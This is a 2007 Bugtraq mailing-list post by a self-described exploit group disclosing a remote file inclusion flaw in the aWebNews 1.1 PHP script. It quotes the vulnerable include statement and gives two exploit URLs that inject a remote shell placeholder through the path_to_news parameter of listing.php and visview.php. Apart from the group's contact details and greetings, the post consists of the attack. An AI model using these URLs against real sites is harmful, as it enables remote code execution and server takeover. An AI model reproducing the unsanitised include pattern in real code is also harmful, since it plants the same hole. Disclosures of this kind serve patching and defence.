
Date: 1 Mar 2007 19:11:22 -0000
From: mostafa_ragab@....com
To: bugtraq@...urityfocus.com
Subject: aWebNews V 1.1

******************************************************************************* 
>>To ConTacT mE @ www.Asb-May.net/bb 
>>ScRiPt:-http://scripts.ringsworld.com/news-publishing/awebnews.zip 
>>GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup) 
>>Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >> 
****************************************************************************** 
>>comment.php:- 
>> 
>>sendmsg:- 
>>include 
>>$config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php"; 
******************************************************************************* 
>>ExPlOiT:-http://www.SitE.*/[aWebNewsPaTh]/listing.php?path_to_news=[Shell] 
>>ExPlOiT:-http://www.SitE.*/[aWebNewsPaTh]/visview.php?path_to_news=Shell] 
******************************************************************************* 
